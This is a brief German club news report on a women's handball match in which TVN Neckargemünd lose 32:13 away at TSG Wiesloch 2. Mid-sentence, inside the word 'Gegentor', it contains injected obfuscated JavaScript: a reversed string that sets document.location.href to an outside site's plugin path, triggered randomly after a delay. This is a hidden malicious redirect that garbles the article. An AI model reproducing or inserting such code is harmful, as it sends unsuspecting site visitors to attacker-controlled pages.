Neckargemünd, 07.03.17 (kkn)
Wieder einmal schwach besetzt, traten die Damen des TVN, am Sonntag, den Weg zum Tabellenzweiten nach Wiesloch an. Außerdem waren M.Weber und E.Weitzel gesundheitlich angeschlagen.
Ganze 11 Minuten dauerte es bis die Gäste aus Neckargemünd ihr erstes Tor erzielen konnten. Die Damen der TSG Wiesloch 2 hingegen hatte bis dahin schon neun Tore zu verbuchen. In der 24. Spielminute erzielte L.Illenberger durch Kampfeinsatz den Treffer zum 16:4. Nun wachten die Damen des TVN endlich auf und zeigten die sechs restlichen Minuten eine gut funktionierende Abwehr. Mit 17:6 ging es in die Halbzeitpause.
In der 45. Spielminute stand es 26:7. Dann erlebten die Neckargemünder Damen nochmals einen kurzen Aufschwung indem sie innerhalb von vier Minuten vier Tore erzielen konnten, ohne ein Gegentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor zu kassieren. 26:11. Das Spiel endete mit 32:13.
Es spielten: S.Thien (Tor), K.Knauf (9), L.Illenberger (2), C.Rückert (1), K.Ebert (1), C.Schimek, E.Weitzel, L.Capriglione, K.Ebert, M.Weber
—